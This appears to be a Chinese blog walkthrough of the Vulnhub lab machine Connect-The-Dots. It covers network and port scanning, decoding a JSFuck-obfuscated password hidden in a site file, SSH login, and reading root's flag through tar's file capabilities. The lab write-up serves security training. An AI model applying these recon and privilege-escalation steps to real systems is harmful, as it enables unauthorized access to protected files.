今天实践的是vulnhub的Connect-The-Dots镜像,
下载地址,https://download.vulnhub.com/connectthedots/Connect-The-Dots.ova,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址192.168.0.187,
继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.187,
获取到靶机上有80端口的web服务和7822端口的ssh服务,
有web服务,做一下目录扫描,dirb http://192.168.0.187,
获取到http://192.168.0.187/index.htm,
浏览器访问http://192.168.0.187/index.htm并查看源码,
获取到mysite地址和norris用户名,
浏览器访问http://192.168.0.187/mysite,
获取到bootstrap.min.cs,
浏览器访问http://192.168.0.187/mysite/bootstrap.min.cs,
获取到编码的内容,
去掉变量名和等号,去http://codertab.com/JsUnFuck解密,
获取到密码,TryToGuessThisNorris@2k19,
ssh登录靶机,ssh [email protected] -p 7822,
不是root,需要提权,
查找root权限程序,/sbin/getcap -r / 2>/dev/null,
获取到/usr/bin/tar,尝试提权到root没成功,只能间接获取root信息,
压缩root下的文件,/usr/bin/tar -cvf raj.tar /root/root.txt,
重新解压,tar -xvf raj.tar,查看信息,cd root,cat root.txt,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Connect-The-Dots的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论